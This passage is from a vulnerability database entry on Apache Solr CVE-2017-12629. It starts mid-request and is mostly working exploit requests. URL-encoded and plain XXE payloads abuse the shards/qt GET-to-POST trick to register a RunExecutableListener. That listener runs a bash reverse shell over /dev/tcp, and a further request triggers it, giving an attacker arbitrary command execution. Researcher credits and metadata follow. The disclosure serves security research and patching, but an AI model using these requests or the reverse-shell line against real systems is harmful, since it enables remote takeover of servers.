36%25%32%35%32%66%25%32%35%37%34%25%32%35%36%33%25%32%35%37%30%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%37%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%31%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%33%25%32%35%33%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%30%25%32%35%33%65%25%32%35%32%36%25%32%35%33%31%25%32%35%32%32%25%32%35%35%64%25%32%35%37%64%25%32%35%37%64%26%73%68%61%72%64%73%3d%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%22%3e%3c%61%3e%3c%2f%61%3e%27%7d ``` Without URL encode: ``` http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","$@\|sh",".","echo","/bin/bash","-i",">&","/dev/tcp/127.0.0.1/1234","0>&1"]}}&shards=localhost:8983/"><a></a>'} ``` As you may notice, in order to update the config we need to send a POST request to the application. But by using XXE vulnerability we can only send HTTP GET requests. There is a special trick is used here: If Solr receives "/select?q=123&qt=/xxx&shards=localhost:8983/" GET request, it actually converts it to POST and redirects this request to the shard specified in "shards" parameter. Which is also cool, it overwrites url query by the "qt" parameter, so we can convert it from "/select" to "/config". The result HTTP request that is landed to localhost:8983/ will be POST request with stream.body="our_value". That is exactly what we need in terms of exploitation. Step 3. Update "newcollection" through XXE to trigger execution of RunExecutableListener ``` http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%75%70%64%61%74%65%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%35%62%25%37%62%25%32%32%25%36%39%25%36%34%25%32%32%25%33%61%25%32%32%25%34%31%25%34%31%25%34%31%25%32%32%25%37%64%25%35%64%26%63%6f%6d%6d%69%74%3d%74%72%75%65%26%6f%76%65%72%77%72%69%74%65%3d%74%72%75%65%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20 ``` Without URL encode: ``` http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/update?stream.body=[{"id":"AAA"}]&commit=true&overwrite=true"><a></a>'} ``` Step 5. When the "/bin/sh c $@\|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1" command is executed during update, a new shell session will be opened on the netcat listener. An attacker can execute any shell command on the server where Solr is running. In all three requests Solr responds with different errors, but all of these error are happened after desired actions are executed. All these vulnerabilities were tested on the latest version of Apache Solr with the default cloud config (bin/solr start -e cloud -noprompt) These vulnerabilities were discovered by: Michael Stepankin (JPMorgan Chase) Olga Barinova (Gotham Digital Science)
id	SSV:96734
last seen	2017-11-19
modified	2017-10-19
published	2017-10-19
reporter	Root
title	Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution(CVE-2017-12629)

Summary

Vulnerable Configurations

Common Weakness Enumeration (CWE)

Exploit-Db

Nessus

Packetstorm

Redhat

Seebug

Related news

References